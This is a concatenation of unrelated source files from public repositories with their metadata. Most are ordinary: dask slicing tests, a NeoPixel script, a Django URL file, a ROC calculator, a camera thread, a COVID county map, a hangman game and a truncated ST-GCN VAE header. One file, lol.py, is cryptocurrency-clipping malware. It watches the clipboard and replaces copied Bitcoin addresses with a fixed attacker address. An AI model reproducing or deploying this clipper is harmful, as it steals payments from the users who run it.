    expected = {'c': (getarray, (range, 10), (slice(0, None, None),)),
                'd': (getarray, 'c', (slice(0, 5, None),)),
                'e': (getarray, 'd', (slice(None, None, None),))}
    result = optimize_slices(fuse(dsk, ['c', 'd', 'e'])[0])
    assert result == expected
# Composing two slices yields the equivalent single slice.
def test_fuse_slice():
    assert fuse_slice(slice(10, 15), slice(0, 5, 2)) == slice(10, 15, 2)
    assert (fuse_slice((slice(100, 200),), (None, slice(10, 20))) ==
            (None, slice(110, 120)))
    assert (fuse_slice((slice(100, 200),), (slice(10, 20), None)) ==
            (slice(110, 120), None))
    assert (fuse_slice((1,), (None,)) ==
            (1, None))
    assert (fuse_slice((1, slice(10, 20)), (None, None, 3, None)) ==
            (1, None, None, 13, None))
    # Negative indexing into a strided slice is not supported.
    with pytest.raises(NotImplementedError):
        fuse_slice(slice(10, 15, 2), -1)
# Fancy (list) indices compose with slices and integers as expected.
def test_fuse_slice_with_lists():
    assert fuse_slice(slice(10, 20, 2), [1, 2, 3]) == [12, 14, 16]
    assert fuse_slice([10, 20, 30, 40, 50], [3, 1, 2]) == [40, 20, 30]
    assert fuse_slice([10, 20, 30, 40, 50], 3) == 40
    assert fuse_slice([10, 20, 30, 40, 50], -1) == 50
    assert fuse_slice([10, 20, 30, 40, 50], slice(1, None, 2)) == [20, 40]
# A self-referencing key with None (newaxis) still fuses correctly.
def test_hard_fuse_slice_cases():
    dsk = {'x': (getarray, (getarray, 'x', (None, slice(None, None))),
                 (slice(None, None), 5))}
    assert optimize_slices(dsk) == {'x': (getarray, 'x', (None, 5))}
# getarray_nofancy marks tasks whose fancy indexing must NOT be fused.
def test_dont_fuse_fancy_indexing_in_getarray_nofancy():
    dsk = {'a': (getitem, (getarray_nofancy, 'x', (slice(10, 20, None), slice(100, 200, None))),
                 ([1, 3], slice(50, 60, None)))}
    assert optimize_slices(dsk) == dsk
    dsk = {'a': (getitem, (getarray_nofancy, 'x', [1, 2, 3]), 0)}
    assert optimize_slices(dsk) == dsk
|
[
"honheil@ymail.com"
] |
honheil@ymail.com
|
4f050260275dbcff6d7c7199439d9a6b5f3113e7
|
18f0ad99e21e2e35126f8c3c28079d358fa2129a
|
/QTPy_Heart/code.py
|
6c3ff81419af412798c2acf0e99934d7ca0fec34
|
[
"MIT"
] |
permissive
|
ladyada/Adafruit_Learning_System_Guides
|
9bf18dfa35941e0cbecbb3c2d02b4fa3cb79744f
|
6d76801878cbf65132ccea950dc47ae842c73dcd
|
refs/heads/master
| 2023-08-20T20:30:42.910576
| 2022-01-10T20:28:11
| 2022-01-10T20:28:11
| 115,837,894
| 13
| 2
|
MIT
| 2020-03-31T23:23:45
| 2017-12-31T02:34:47
|
C
|
UTF-8
|
Python
| false
| false
| 455
|
py
|
# CircuitPython script: pulse a NeoPixel strip red (QT Py "heart").
import board
import neopixel
from adafruit_led_animation.animation.pulse import Pulse
from adafruit_led_animation.color import RED
# Update to match the pin connected to your NeoPixels
pixel_pin = board.D1
# Update to match the number of NeoPixels you have connected
pixel_num = 6
pixels = neopixel.NeoPixel(pixel_pin, pixel_num, brightness=0.5, auto_write=False)
# Pulse animation: fade the strip in and out in red, one cycle per second.
pulse = Pulse(pixels, speed=0.01, color=RED, period=1)
# Main loop: advance the animation forever.
while True:
    pulse.animate()
|
[
"noe@adafruit.com"
] |
noe@adafruit.com
|
52bd0d1126ac9b38f2fa9a5c77910bb87a1298e6
|
3bda0a4b4f8476974bff96dd52974e6974108a4e
|
/dAAMs/lineerror.py
|
fa18515637cc010a7b4c3f4611ae5e9bd51a8fdc
|
[
"MIT"
] |
permissive
|
yuxiang-zhou/DenseDeformableModel
|
d0fde03cc266dc495201b3a2c9d978d2b931dbf8
|
0239d32f7694894c1dc564d4fd7131d0b7862ebc
|
refs/heads/master
| 2020-03-21T15:46:58.832222
| 2018-06-26T12:11:26
| 2018-06-26T12:11:26
| 138,732,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,209
|
py
|
__author__ = 'yz4009'
import numpy as np
from scipy.interpolate import interp1d
from menpo.shape import PointCloud
def arclen_polyl(cnt):
    """Arc-length parameterisation of a polyline.

    Returns ``(alparam, cntLen)``: the cumulative arc length at every
    vertex of the (N, 2) array ``cnt``, and the total polyline length.
    """
    deltas = np.diff(cnt, axis=0)
    seg_lengths = np.sqrt(np.power(deltas[:, 0], 2) + np.power(deltas[:, 1], 2))
    # Prepend 0 so the parameter of the first vertex is 0.
    alparam = np.cumsum(np.hstack((0, seg_lengths)))
    return alparam, alparam[-1]
def interpolate(points, step, kind='slinear'):
    """Resample a polyline at a fixed arc-length spacing.

    Parameters
    ----------
    points : (N, 2) ndarray
        Polyline vertices.
    step : float
        Arc-length distance between consecutive resampled points.
    kind : str, optional
        Interpolation kind forwarded to ``scipy.interpolate.interp1d``
        (default piecewise-linear ``'slinear'``).

    Returns
    -------
    (M, 2) ndarray of points sampled every ``step`` along the line.
    """
    # Cleanup: removed a large block of dead commented-out code and
    # hoisted the sample grid, which was previously computed twice.
    alparam, cntLen = arclen_polyl(points)
    # Interpolate each coordinate as a function of arc length.
    f_x = interp1d(
        alparam, points[:, 0], kind=kind
    )
    f_y = interp1d(
        alparam, points[:, 1], kind=kind
    )
    samples = np.arange(0, cntLen, step)
    points_dense_x = f_x(samples)
    points_dense_y = f_y(samples)
    points_dense = np.hstack((
        points_dense_x[:, None], points_dense_y[:, None]
    ))
    return points_dense
def line_diff(l1, l2):
    """Mean-of-minimum squared distances between two 2-D point sets.

    Returns ``(msd_ab, msd_ba)``: the mean over l2's points of the
    squared distance to the closest point of l1, and the symmetric
    quantity for l1 against l2.
    """
    # Broadcast to an (Na, Nb) matrix of pairwise squared distances
    # (equivalent to the repeat-based formulation, without the copies).
    dx = l1[:, 0][:, None] - l2[:, 0][None, :]
    dy = l1[:, 1][:, None] - l2[:, 1][None, :]
    sq_dists = dx * dx + dy * dy
    msd_ab = np.mean(np.min(sq_dists, 0))
    msd_ba = np.mean(np.min(sq_dists, 1))
    return msd_ab, msd_ba
def compute_line_error(pts1, pts2, gp):
    """Arc-length-weighted symmetric distance between two annotated shapes.

    Parameters
    ----------
    pts1, pts2 : (N, 2) ndarray or menpo PointCloud
        Corresponding landmark sets.
    gp : iterable of index arrays
        Each entry selects the landmarks forming one curve (line group).

    Returns the summed per-curve error normalised by total curve length.
    """
    # Accept either raw arrays or menpo PointClouds.
    pts1 = pts1.points if isinstance(pts1, PointCloud) else pts1
    pts2 = pts2.points if isinstance(pts2, PointCloud) else pts2
    error = 0
    length = 0
    for g in gp:
        gl1 = pts1[g, :]
        gl2 = pts2[g, :]
        # Densify both curves at 0.5-unit arc-length spacing so the
        # nearest-point distances below measure curve (not vertex) gaps.
        gl1 = interpolate(gl1, 0.5)
        gl2 = interpolate(gl2, 0.5)
        _, tl1 = arclen_polyl(gl1)
        _, tl2 = arclen_polyl(gl2)
        d1, d2 = line_diff(gl1, gl2)
        # Length-weighted roots of the two mean squared distances,
        # normalised by the combined curve length.
        error += np.sum(np.sqrt([d1*tl1, d2*tl2])) / (tl1 + tl2)
        length += (tl1 + tl2) / 2
    return error / length
|
[
"yuxiang.zhou10@imperial.ac.uk"
] |
yuxiang.zhou10@imperial.ac.uk
|
126f8dcda50d7a1c951fcde8cb0f76ea4a0ad244
|
f6d56f56c7ab25e2474c9283e975151d7bf080ed
|
/kube-manager/kube_manager/urls.py
|
402f4d0dbd4c5f9420769278746d60df582cdd04
|
[] |
no_license
|
tushar-lb/task-manager
|
ffd022109be51d5a26946745f845c32de923c6c8
|
d3aab97d25f56eacefcd43d28245b3fc5a8f622b
|
refs/heads/master
| 2022-11-08T21:53:58.246174
| 2020-07-02T19:29:48
| 2020-07-02T19:29:48
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,077
|
py
|
"""kube_manager URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url, include
from django.contrib import admin
from kube_manager_portal.views import *
from rest_framework_swagger.views import get_swagger_view
from rest_framework.documentation import include_docs_urls
schema_view = get_swagger_view(title='KubeManager APIs')
urlpatterns = [
url('^$', schema_view),
url(r'^admin/', admin.site.urls),
url(r'^app/', include('kube_manager_portal.urls')),
]
|
[
"galaxy.tusharraut@gmail.com"
] |
galaxy.tusharraut@gmail.com
|
1e2291bfc53508b9a3c3f5cb5a655df9ea1c904c
|
7462d58d01247a784fa73617728842c652076911
|
/calculation/roc.py
|
7ef0eeb551cd131852577f9e5b5cd8ba1e6a66e6
|
[
"MIT"
] |
permissive
|
mike10004/smatterscripts
|
270c30c1d4c28f74737e6878d2cf7517e5820276
|
d1fc9c0a3b85b5f30a0b170508a4cd789665e820
|
refs/heads/master
| 2020-06-05T09:14:07.340904
| 2019-07-30T15:54:49
| 2019-07-30T15:54:49
| 30,710,157
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,720
|
py
|
#!/usr/bin/env python3
"""Perform receiver-operating characteristic transform on input values."""
import csv
import re
import os
import sys
import json
import errno
import logging
import _common
import calculation
from _common import predicates
from typing import Callable, TextIO, List, Any, Pattern, Dict, Sequence, Tuple, Optional, Union, Iterable, Iterator
from argparse import ArgumentParser, Namespace
from . import ValueParser, Ignorer
_log = logging.getLogger(__name__)
class Element(object):
    """One scored sample: a thresholded predictor plus its true label.

    ``evaluator`` maps a threshold to the predicted boolean;
    ``ground_truthist`` is either the label itself or a nullary
    callable producing it lazily (cached after the first call).
    """
    def __init__(self, evaluator: Callable[[Any], bool], ground_truthist: Union[bool, Callable[[], bool]]):
        self.evaluator = evaluator
        self.ground_truthist = ground_truthist
        # Cache eagerly when the label is already a plain bool.
        if isinstance(ground_truthist, bool):
            self._ground_truth = ground_truthist
        else:
            self._ground_truth = None
    def evaluate(self, threshold):
        """Predicted label of this sample at the given threshold."""
        return self.evaluator(threshold)
    def ground_truth(self):
        """True label; computed lazily and cached on first use."""
        if self._ground_truth is None:
            self._ground_truth = self.ground_truthist()
        return self._ground_truth
    @classmethod
    def list(cls, values: Iterator, ground_truth: bool):
        """Wrap raw score values as Elements sharing one ground truth."""
        return [Element(_make_evaluator(v), ground_truth) for v in values]
def roc_transform(elements: Sequence[Element], threshold_domain: Iterable) -> Dict[float, Tuple[float, float]]:
    """Map each threshold to (false-positive rate, false-negative rate).

    Rates are normalised by the number of known negatives / positives
    respectively; a warning is logged when either count is zero (the
    corresponding rate would then divide by zero).
    """
    known_pos = sum(e.ground_truth() for e in elements)
    known_neg = sum(not e.ground_truth() for e in elements)
    if known_pos == 0 or known_neg == 0:
        _log.warning("known positives = %d, known negatives = %d", known_pos, known_neg)
    curve = {}
    for threshold in threshold_domain:
        fp = 0
        fn = 0
        for e in elements:
            truth = e.ground_truth()
            predicted = e.evaluate(threshold)
            if truth and not predicted:  ## missed a known positive
                fn += 1
            elif predicted and not truth:  ## flagged a known negative
                fp += 1
        curve[threshold] = (fp / known_neg, fn / known_pos)
    return curve
def decide_domain(values: Iterator[float], domain_size: int=None, epsilon=1e-5) -> Iterator[float]:
    """Choose an evenly spaced threshold domain spanning *values*.

    The domain covers [min, max + epsilon) in ``domain_size`` steps
    (default 100). A degenerate input (all values equal) yields a
    single-element domain; asking for more than one threshold in that
    case raises ValueError.
    """
    ordered = sorted(values)
    assert len(ordered) > 0, "zero elements in input"
    lo, hi = ordered[0], ordered[-1]
    span = hi - lo
    if span == 0:
        if domain_size is not None and domain_size != 1:
            raise ValueError("only one element in threshold domain")
        return iter([lo])
    if domain_size is None:
        domain_size = 100
    # epsilon nudges the last step so max itself falls inside the domain.
    step = (span + epsilon) / domain_size
    return (lo + (i * step) for i in range(domain_size))
def _make_evaluator(value):
return lambda threshold: value >= threshold
def main(argl: Sequence[str]=None, ofile: TextIO=sys.stdout) -> int:
    """CLI entry point: read known-positive and known-negative score
    files, compute the ROC transform, and write TSV rows of
    (threshold, false-positive rate, false-negative rate) to *ofile*.

    Returns 0 on success.
    """
    parser = ArgumentParser()
    parser.add_argument("known_positives")
    parser.add_argument("known_negatives")
    parser.add_argument("--invert", action='store_true', help="invert input values")
    parser.add_argument("--domain", type=float, nargs=2, metavar=("MIN", "STEP"), help="threshold domain")
    parser.add_argument("--domain-size", "-n", type=int, default=100, metavar="N", help="threshold domain size")
    _common.add_logging_options(parser)
    args = parser.parse_args(argl)
    _common.config_logging(args)
    value_type = float
    invert = args.invert
    parse_fn = calculation.build_parse_value(value_type, invert)
    value_parser = ValueParser(parse_fn, predicates.always_true())
    # One score per line in each input file.
    with open(args.known_positives, 'r') as ifile:
        known_positives = value_parser.read_values(ifile)
    with open(args.known_negatives, 'r') as ifile:
        known_negatives = value_parser.read_values(ifile)
    _log.debug(" parsed %d known positives and %d known negatives", len(known_positives), len(known_negatives))
    positive_elements = Element.list(known_positives, True)
    negative_elements = Element.list(known_negatives, False)
    all_elements = positive_elements + negative_elements
    # Either derive the threshold domain from the data, or build it
    # from the explicit (MIN, STEP) pair.
    if args.domain is None:
        threshold_domain = decide_domain(known_positives + known_negatives, args.domain_size)
    else:
        t_min, t_step = args.domain
        threshold_domain = [t_min + i * t_step for i in range(args.domain_size)]
    roc = roc_transform(all_elements, threshold_domain)
    roc_keys = sorted(roc.keys())
    writer = csv.writer(ofile, delimiter="\t")
    for threshold in roc_keys:
        false_pos_rate, false_neg_rate = roc[threshold]
        row = [threshold, false_pos_rate, false_neg_rate]
        writer.writerow(row)
    return 0
|
[
"mchaberski@novetta.com"
] |
mchaberski@novetta.com
|
e1753a9b57a697ecc0d4fd06df813330e9c4dbee
|
ee01a7b228c6705b389a2aa7900019dd1cd25e77
|
/cam_accelerate.py
|
de2a28e8bdddae0e112fd5d36c51b3ca2d84b7a1
|
[] |
no_license
|
DDDDDaryl/guidance_line_extraction
|
a14f3bb2c4fc4274d440b3e7b2ec57aa3a96dc89
|
ff5d5099bbef0b93fb175cf9dd73370f64e8e1a4
|
refs/heads/master
| 2023-04-08T07:16:00.811959
| 2021-04-05T13:48:20
| 2021-04-05T13:48:20
| 350,697,534
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 993
|
py
|
import threading
import cv2
class camCapture:
    """Threaded OpenCV camera reader.

    A daemon thread continuously grabs frames from the device, so
    ``getframe()`` always returns the most recent image without
    blocking on ``VideoCapture.read()``.
    """
    def __init__(self, dev):
        # Latest grabbed frame (0 until the first successful read).
        self.Frame = 0
        # Result flag of the most recent capture.read() call.
        self.status = False
        # Set to True by stop() to end the capture loop.
        self.isstop = False
        # Connect to the camera device.
        self.capture = cv2.VideoCapture(dev)
        # self.capture.set(3, 1280)
        # self.capture.set(4, 720)
    def isOpened(self):
        # Whether the underlying VideoCapture opened successfully.
        return self.capture.isOpened()
    def start(self):
        # Run the grab loop in a child thread; daemon=True means the
        # thread dies together with the main thread.
        print('cam started!')
        threading.Thread(target=self.queryframe, daemon=True, args=()).start()
    def stop(self):
        # Flip the switch that terminates the endless capture loop.
        self.isstop = True
        print('cam stopped!')
    def getframe(self):
        # Return the most recently captured frame on demand.
        return self.Frame
    def queryframe(self):
        # Grab frames as fast as possible until stop() is called,
        # then release the device.
        while (not self.isstop):
            self.status, self.Frame = self.capture.read()
        self.capture.release()
|
[
"954562905@qq.com"
] |
954562905@qq.com
|
d751681b069ad21dbf0c56aae742b467d7fc2350
|
92dbb16f383754fd9fd8d35c87b68977ec42a586
|
/data/20200521-graph/GA_week.py
|
1791ce0447a110c3ecd410453f070ddf7d372e47
|
[] |
no_license
|
YWJL/pchong
|
c0c1bfa4695ac3b143430fd2291b197b4fdab884
|
eaa98c5ed3daad60e8ac0560634ba631e665f00e
|
refs/heads/master
| 2022-11-11T00:01:55.550199
| 2020-07-01T06:11:56
| 2020-07-01T06:11:56
| 276,290,019
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,686
|
py
|
import pandas as pd
#coding:utf-8
import asyncio
import os
from pyecharts import options as opts
from pyecharts.charts import Map, Timeline
from pyecharts.faker import Faker
from aiohttp import TCPConnector, ClientSession
from typing import List
import pyecharts.options as opts
from pyecharts.globals import ThemeType
from pyecharts.commons.utils import JsCode
from pyecharts.charts import Timeline, Grid, Bar, Map, Pie, Line
import json
async def get_json_data(url: str) -> dict:
    """Fetch *url* asynchronously and decode the response body as JSON.

    SSL certificate verification is disabled on the connector.
    """
    connector = TCPConnector(ssl=False)
    async with ClientSession(connector=connector) as session:
        async with session.get(url=url) as response:
            payload = await response.json()
            return payload
# Fetch the Georgia county GeoJSON from the web (kept for reference; the
# local GA.json copy below is what is actually registered with echarts).
Js_data = asyncio.run(
    get_json_data(url="https://coronavirus.1point3acres.com/resources/maps/us_map/GA.json")
) # or fetch the web JSON this way
with open('GA.json', 'r') as f:
    Js_2data=json.loads(f.read())
# Daily cumulative case counts per county; one date column per day.
name='20200521-us_state-data.json.csv'
DATA=pd.read_csv(name)
print(len(DATA.columns.values))
day=len(DATA.columns.values)-3
print(DATA.columns.values[-1])# column name (latest date)
# print(Positive)
print(DATA.iloc[0,0])
Country=[]
Pos=[]
print(DATA)
# NOTE(review): rows 389..531 are assumed to be the Georgia counties and the
# last column the newest cumulative count -- the hard-coded 388 offset
# depends on the CSV's fixed row layout; verify against the file.
for i in range(1,144):
    Country.append(DATA.iloc[i+388,2])
    Pos.append(float(DATA.iloc[i+388,-1]))
MAP_data=[list(z) for z in zip(Country,Pos)]
print(MAP_data)
# with open('20200508-GA-data.json', 'r') as f:
# data2=json.loads(f.read())
# print(data2)
print(sum(Pos))
rate=100000/sum(Pos)
# Per-county series: Posi_k holds either the raw count k-1 days back or the
# k-day average growth ratio (for k = 3, 5, 7).
Posi_7=[]
Posi_6=[]
Posi_5=[]
Posi_4=[]
Posi_3=[]
Posi_2=[]
Posi_1=[]
pos_account1=[]
pos_account3=[]
pos_account5=[]
pos_account7=[]
for i in range(1,144):
    Posi_1.append(float(DATA.iloc[i+388,-1]))
    Posi_2.append(float(DATA.iloc[i + 388, -2]))
    Posi_3.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-3]))/3/(int(DATA.iloc[i + 388, -1])))
    Posi_4.append(float(DATA.iloc[i + 388, -4]))
    Posi_5.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-5]))/5/(int(DATA.iloc[i + 388, -1])))
    Posi_6.append(float(DATA.iloc[i + 388, -6]))
    Posi_7.append(float((int(DATA.iloc[i+388,-1]))-int(DATA.iloc[i+388,-7]))/7/(int(DATA.iloc[i + 388, -1])))
    pos_account1.append(int(DATA.iloc[i+388,-1]))
    pos_account3.append(int(DATA.iloc[i+388,-3]))
    pos_account5.append(int(DATA.iloc[i+388,-5]))
    pos_account7.append(int(DATA.iloc[i+388,-7]))
# State-wide average daily growth over the last 3 / 5 / 7 days.
account3=float((sum(pos_account1)-sum(pos_account3))/3/(sum(pos_account1)))
account5=(sum(pos_account1)-sum(pos_account5))/5/(sum(pos_account1))
account7=(sum(pos_account1)-sum(pos_account7))/7/(sum(pos_account1))
print(sum(pos_account1))
# account_pos='%.2f%%' % (account_pos * 100)
account3='%.2f%%' % (account3 * 100)
account5='%.2f%%' % (account5 * 100)
account7='%.2f%%' % (account7 * 100)
# Growth ratios formatted as percentages (strings) for the map tooltips;
# num collects the raw numbers to size the visual-map colour range.
POS3=[]
POS5=[]
POS7=[]
num=[]
for i in range(0,143):
    a=Posi_3[i]*100
    POS3.append('%.4f' % a)
    b=Posi_5[i]*100
    POS5.append('%.4f' % b)
    c=Posi_7[i]*100
    POS7.append('%.4f' % c)
    num.append(a)
    num.append(b)
    num.append(c)
Standard_data_7=[list(z) for z in zip(Country,Posi_7)]
# pos[k] pairs county names with the corresponding series for the map.
pos={}
pos[0]=[list(z) for z in zip(Country,Posi_1)]
pos[1]=[list(z) for z in zip(Country,Posi_2)]
pos[2]=[list(z) for z in zip(Country,POS3)]
pos[3]=[list(z) for z in zip(Country,Posi_4)]
pos[4]=[list(z) for z in zip(Country,POS5)]
pos[5]=[list(z) for z in zip(Country,Posi_6)]
pos[6]=[list(z) for z in zip(Country,POS7)]
print('Posi_7',Posi_7)
print(pos[6])
test3=[list(z) for z in zip(Country,Posi_3)]
test5=[list(z) for z in zip(Country,Posi_5)]
test7=[list(z) for z in zip(Country,Posi_7)]
print(test7)
print(float(DATA.iloc[387,-1])/(DATA.iloc[387, -7])-1)
print(DATA.iloc[389,2])
time="2020/{}Georgia疫情情况".format(DATA.columns.values[-1])
tl = Timeline()
i=1
a=0
a=(int(DATA.iloc[i+388,-1])+int(DATA.iloc[i+388,-2]))
# print(float((DATA.iloc[i+388,-1])+(DATA.iloc[i+388,-2])+(DATA.iloc[i+388,-3]))/(DATA.iloc[i + 388, -3]))
print(a)
# Render one map with three switchable series (3/5/7-day growth ratios)
# and write it out as a standalone HTML page.
map_ga = (
    Map(init_opts=opts.InitOpts(width="1400px", height="800px"))
    .add_js_funcs("echarts.registerMap('GA', {});".format(Js_2data))
    .add(
        series_name="至{}天前确诊病例数".format(2+1),
        maptype="GA",
        data_pair=pos[2],
        # name_map=NAME_MAP_DATA,
        is_map_symbol_show=False, # red dot markers (hidden)
        # itemstyle_opts={Timeline
        # },
    )
    .add(
        series_name="至{}天前确诊病例数".format(4+1),
        maptype="GA",
        data_pair=pos[4],
        # name_map=NAME_MAP_DATA,
        is_map_symbol_show=False, # red dot markers (hidden)
        # itemstyle_opts={Timeline
        # },
    )
    .add(
        series_name="至{}天前确诊病例数".format(7),
        maptype="GA",
        data_pair=pos[6],
        # name_map=NAME_MAP_DATA,
        is_map_symbol_show=False, # red dot markers (hidden)
        # itemstyle_opts={Timeline
        # },
    )
    .set_global_opts(
        title_opts=opts.TitleOpts(
            title=time,
            subtitle="近七天感染人数增长比:{} 近五天:{} 近三天:{}".format(account7,account5,account3),
            pos_top="4%",
            pos_left="45%"
        ),
        tooltip_opts=opts.TooltipOpts(
            trigger="item", formatter="{b0}:{c0}%" # {a}<br/>:{c0} would add a line break
        ),
        visualmap_opts=opts.VisualMapOpts(
            min_=min(num),
            max_=max(num),
            range_text=["High", "Low"],
            is_calculable=True,
            range_color=["lightskyblue", "yellow", "orangered"],
        ),
    )
    .render("Georgia州近七天感染状况.html"))
# print(max(Posi_7))
|
[
"201256153@qq.com"
] |
201256153@qq.com
|
480d75ae64301371ba3162c4d02210e80e4abcb0
|
ecfb1f52fd7a1c708e65fb3060a29cd853cd58d8
|
/lol.py
|
79c43b9b063ea81d659c38b42b39ecdf29deb23f
|
[
"Apache-2.0"
] |
permissive
|
DarkhackerTH/README
|
593fd16c186e9470ee9c247ee654cde03a5c9490
|
a22e5581543250660616bf06e6bbb0f12afdecc7
|
refs/heads/master
| 2020-04-12T04:27:16.965747
| 2018-12-18T14:22:13
| 2018-12-18T14:22:13
| 162,296,142
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 622
|
py
|
import subprocess
destination_address = b'1FfmbHfnpaZjKFvyi1okTjJJusN455paPH'
def get_clipboard():
p = subprocess.popen(['pbpaste'], stdout=subprocess.PIPE) # acces clipboard
data = str(p.stdout.read()) # read data on clipboard on converte to string
if len(data) > 33: # if bitcoin address
swap_address(data)
def swap_address(data):
p = subprocess.popen(['pbcopy'], stdin=subprocess.PIPE) # access clipboard
p.stdin.write(destination_address) # write destination address
p.stdin.write(destination_address) # write destination address
p.stdin.close# ()
while True:
get_clipboard()
|
[
"noreply@github.com"
] |
DarkhackerTH.noreply@github.com
|
09441d31864319e46938943499e4d9556c12ac0b
|
c3bd566cacbd02eba80a9d0b8278ea40b80de4b0
|
/game.py
|
77591c2ccb7def25b230f6b7ccc6124e6aecc8fd
|
[] |
no_license
|
bella1116/Pre-Interview
|
4c3c0627c17b4c752995db386255e87f99dda8e5
|
07470610d25ed74fbab650075bc1917c3c6c851e
|
refs/heads/master
| 2023-05-28T18:09:02.460407
| 2021-06-11T17:32:57
| 2021-06-11T17:32:57
| 374,991,228
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,386
|
py
|
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import QApplication, QWidget
from PyQt5.QtWidgets import QLayout, QGridLayout
from PyQt5.QtWidgets import QTextEdit, QLineEdit, QToolButton
from hangman import Hangman
from guess import Guess
from word import Word
class HangmanGame(QWidget):
    """Main hangman window: a drawing pane plus a status/input panel.

    Game state lives in the Hangman (lives/figure), Guess (secret word and
    guessed letters) and Word (word database) helper objects.
    """
    def __init__(self, parent=None):
        super().__init__(parent)
        # Initialize word database
        self.word = Word('words.txt')
        # Hangman display window
        self.hangmanWindow = QTextEdit()
        self.hangmanWindow.setReadOnly(True)
        self.hangmanWindow.setAlignment(Qt.AlignLeft)
        # Monospace font so the ASCII-art hangman figure lines up.
        font = self.hangmanWindow.font()
        font.setFamily('Courier New')
        self.hangmanWindow.setFont(font)
        # Layout
        hangmanLayout = QGridLayout()
        hangmanLayout.addWidget(self.hangmanWindow, 0, 0)
        # Status Layout creation
        statusLayout = QGridLayout()
        # Display widget for current status
        self.currentWord = QLineEdit()
        self.currentWord.setReadOnly(True)
        self.currentWord.setAlignment(Qt.AlignCenter)
        font = self.currentWord.font()
        font.setPointSize(font.pointSize() + 8)
        self.currentWord.setFont(font)
        # Widened field (30 columns) - can display words up to 19 characters
        statusLayout.addWidget(self.currentWord, 0, 0, 1, 30)
        # Display widget for already used characters
        self.guessedChars = QLineEdit()
        self.guessedChars.setReadOnly(True)
        self.guessedChars.setAlignment(Qt.AlignLeft)
        self.guessedChars.setMaxLength(52)
        statusLayout.addWidget(self.guessedChars, 1, 0, 1, 2)
        # Display widget for message output
        self.message = QLineEdit()
        self.message.setReadOnly(True)
        self.message.setAlignment(Qt.AlignLeft)
        self.message.setMaxLength(52)
        statusLayout.addWidget(self.message, 2, 0, 1, 2)
        # Input widget for user selected characters
        self.charInput = QLineEdit()
        self.charInput.setMaxLength(1)
        statusLayout.addWidget(self.charInput, 3, 0)
        # Button for submitting a character
        self.guessButton = QToolButton()
        self.guessButton.setText('Guess!')
        self.guessButton.clicked.connect(self.guessClicked)
        statusLayout.addWidget(self.guessButton, 3, 1)
        # Button for a new game
        self.newGameButton = QToolButton()
        self.newGameButton.setText('New Game')
        self.newGameButton.clicked.connect(self.startGame)
        statusLayout.addWidget(self.newGameButton, 4, 0)
        # Layout placement
        mainLayout = QGridLayout()
        mainLayout.setSizeConstraint(QLayout.SetFixedSize)
        mainLayout.addLayout(hangmanLayout, 0, 0)
        mainLayout.addLayout(statusLayout, 0, 1)
        self.setLayout(mainLayout)
        self.setWindowTitle('Hangman Game')
        # Start a new game on application launch!
        self.startGame()
    def startGame(self):
        """Reset all game state and the display for a fresh round."""
        self.hangman = Hangman()
        # Reset the hangman (lives/figure) state
        self.guess = Guess(self.word.randFromDB())
        # Pick a new secret word
        self.gameOver = False
        # Reset the game-over flag
        self.hangmanWindow.setPlaceholderText(self.hangman.currentShape())
        self.currentWord.setText(self.guess.displayCurrent())
        # Show the (masked) current word
        self.guessedChars.setText(self.guess.displayGuessed())
        # Show the guessed-letters set
        self.message.clear()
        # Clear the message line
    def guessClicked(self):
        """Handle one letter submission: validate, apply, update display."""
        guessedChar = self.charInput.text()
        self.charInput.clear()
        self.message.clear()
        if self.gameOver == True:
            # Round already finished; just report it
            self.message.setText("game over")
            return
        # Input must be exactly one character
        if len(guessedChar) != 1:
            self.message.setText("you should input only one letter!")
            return
        # Reject letters that were already tried
        if guessedChar in self.guess.guessedChars:
            self.message.setText("you already input it")
            return
        success = self.guess.guess(guessedChar)
        if success == False:
            # Wrong guess: lose one remaining life
            self.hangman.decreaseLife()
            # Tell the player
            self.message.setText("Oops, it is not an answer!")
        # Draw the current hangman figure
        self.hangmanWindow.setText(self.hangman.currentShape())
        # Show the partially revealed word
        self.currentWord.setText(self.guess.displayCurrent())
        # Show the set of letters used so far
        self.guessedChars.setText(self.guess.displayGuessed())
        if self.guess.finished():
            # Word fully revealed: report success and end the round
            self.message.setText("Success!")
            self.gameOver = True
        elif self.hangman.getRemainingLives() == 0:
            # Out of lives: report failure with the secret word
            self.message.setText("Fail! Answer: " + self.guess.secretWord)
            self.gameOver = True
if __name__ == '__main__':
    import sys

    # Launch the Qt event loop with a single game window.
    application = QApplication(sys.argv)
    window = HangmanGame()
    window.show()
    sys.exit(application.exec_())
|
[
"dldpgus7@gmail.com"
] |
dldpgus7@gmail.com
|
5acfce5a82800a721f5ec417bee2535e5c49909a
|
82b2e6a1ca04728f6754219bd1996069e7fa7252
|
/models/st_gcn_VAE.py
|
00b050d8c958c2ef6afd9c575a6b37eb7a49b24e
|
[] |
no_license
|
FredHuangBia/ActionFromFuturePose
|
dd16518e29fb99eb17c9561e9e0330bee4fd2c22
|
47ae871f86eb63c5a1d0feec5cc1e6ace4dfacf6
|
refs/heads/master
| 2020-05-07T11:53:57.003380
| 2019-08-27T01:42:32
| 2019-08-27T01:42:32
| 180,480,051
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,339
|
py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.autograd import Variable
from models.utils.tgcn import ConvTemporalGraphical
from models.utils.graph import Graph
class Model_VAE(nn.Module):
    r"""Spatial-temporal graph convolutional VAE.

    Per-frame spatial graph convolutions encode each skeleton, an LSTM
